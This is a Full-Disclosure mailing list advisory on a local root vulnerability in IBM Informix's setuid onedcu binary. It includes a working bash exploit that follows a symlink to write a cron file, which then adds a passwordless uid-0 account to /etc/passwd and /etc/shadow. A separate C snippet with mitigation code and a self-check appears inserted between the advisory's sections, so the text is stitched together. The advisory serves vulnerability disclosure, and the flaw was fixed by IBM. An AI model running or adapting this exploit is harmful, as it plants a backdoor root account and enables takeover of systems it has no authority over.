From pask@open3s.com Thu Jan 29 20:44:36 2004
From: pask@open3s.com
To: "[Full Disclosure]"
Date: Tue, 27 Jan 2004 15:30:55 +0100 (CET)
Subject: [Full-Disclosure] OPEN3S-2003-08-08-eng-informix-onedcu

----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========----------

Title:    Local Vulnerability in IBM Informix IDSv9.40 onedcu binary
Date:     08-08-2003
Platform: Only tested on Linux, but likely applies to other platforms.
Impact:   Users with exec permission on ./bin/onedcu can create files with mode 666 owned by root.
Author:   Juan Manuel Pascual Escriba
Status:   Solved by IBM Corp.

PROBLEM SUMMARY:

There is a write-permission checking error in the onedcu binary that can be used by local users with exec permission on onedcu to write any file, owned by root, with mode 666.

DESCRIPTION

onedcu is installed with mode 6755 and owned by root.informix in my default installation:

[informix@dimoni onedcu]$ ls -alc /home/informix-9.40/bin/onedcu
-rwsr-sr-x 1 root informix 1066468 Aug 8 23:39 /home/informix-9.40/bin/onedcu

The binary doesn't drop privileges before writing its log, and writes a file named \001 owned by root:

IMPACT:

Easy to overwrite or create new files owned by root (.rhosts, cron files) via link injection.
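As an added example (not the advisory's script and not IBM's onedcu code), a C sketch of the two mitigations this class of bug calls for: a setuid program drops its privileges permanently before touching the filesystem, and opens its log with O_NOFOLLOW plus an explicit 0600 mode so a planted link such as the \001 file above cannot redirect the write. The scratch directory under /tmp and its file names are constructed for the self-check.

```c
#define _GNU_SOURCE            /* O_NOFOLLOW, O_CLOEXEC, mkdtemp on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Permanently drop setuid/setgid privilege to the real uid/gid, as onedcu
 * should do before writing its log. Returns 0 on success, -1 on failure. */
int drop_privileges(void) {
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0) return -1;
    /* For a non-root caller the drop must be irreversible. */
    if (getuid() != 0 && setuid(0) == 0) return -1;
    return 0;
}
/* Open or create a log file without following a planted symlink and with an
 * explicit 0600 mode, so the caller's umask (the exploit uses 000) cannot widen it.
 * Returns an fd, or -1 with errno set (ELOOP on Linux when a symlink is hit). */
int open_log_nofollow(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0) return -1;
    struct stat st;   /* reject anything that is not a regular file we own */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()
        || fchmod(fd, 0600) != 0) {        /* also tighten a pre-existing file */
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}
/* Self-check: plant a symlink named "\001" in a scratch directory (the advisory's
 * trick, aimed at a harmless constructed path) and confirm the hardened open refuses
 * it while a real log still ends up mode 0600 under umask 000. Returns 1 if both hold. */
int self_check(void) {
    char dir[] = "/tmp/onedcu-demo-XXXXXX", target[64], link[64], logf[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/\001", dir);
    snprintf(logf, sizeof logf, "%s/log", dir);
    umask(000);
    int ok = 0;
    if (symlink(target, link) == 0 && drop_privileges() == 0) {
        int bad = open_log_nofollow(link), fd = open_log_nofollow(logf);
        struct stat st;
        ok = bad == -1 && access(target, F_OK) != 0 && fd >= 0
             && write(fd, "log entry\n", 10) == 10
             && fstat(fd, &st) == 0 && (st.st_mode & 07777) == 0600;
        if (bad >= 0) close(bad); if (fd >= 0) close(fd);
    }
    unlink(link); unlink(logf); rmdir(dir);
    return ok;
}
```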
EXPLOIT

#!/bin/bash
ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash
export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std

if [ -d $DIR ]; then
    echo Trash directory already created
else
    mkdir $DIR
fi
cd $DIR

if [ -f ./"\001" ]; then
    echo Link Already Created
else
    ln -s $CRONFILE `echo -e "\001"`
fi

umask 000
$ONEDCU &
kill -9 `pidof $ONEDCU`

echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE

echo " "
echo " This vulnerability was researched by Juan Manuel Pascual Escriba"
echo " 08/08/2003 Barcelona - Spain pask@open3s.com"
echo " "
echo " must wait until cron execute $CRONFILE and then exec su pakito"

STATUS

Reported to the IBM security team on 11 August 2003.

See more information about this vulnerability and the workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336

This vulnerability was managed in an efficient manner by Jonathan Leffler from the IBM Informix Database Engineering Team.

--------------------------------------------------
This vulnerability was researched by:

Juan Manuel Pascual Escriba
pask@open3s.com
Barcelona - Spain
http://www.open3s.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html